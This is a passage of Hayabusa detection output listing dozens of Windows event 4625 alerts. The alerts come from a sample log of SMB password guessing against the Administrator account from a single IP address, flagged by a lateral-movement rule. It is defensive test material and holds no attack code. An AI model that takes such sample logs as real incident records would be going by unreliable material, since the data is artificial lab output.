NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: 